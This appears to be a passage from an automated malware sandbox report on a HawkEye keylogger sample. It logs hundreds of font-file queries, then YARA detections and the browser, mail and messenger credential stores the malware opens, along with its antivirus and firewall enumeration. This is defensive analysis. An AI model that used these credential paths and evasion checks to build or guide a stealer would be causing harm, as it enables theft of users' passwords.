                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00406278 GetVersionExA,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: InstallUtil.exe, 00000010.00000002.499681826.00000000077C0000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                  Yara detected MailPassViewShow sources
                  Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.4089930.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.478476a.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.4089930.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.45fa72.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.358708597.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6860, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Instant Messenger accounts or passwordsShow sources
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
                  Yara detected WebBrowserPassView password recovery toolShow sources
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.unpack, type: UNPACKEDPE
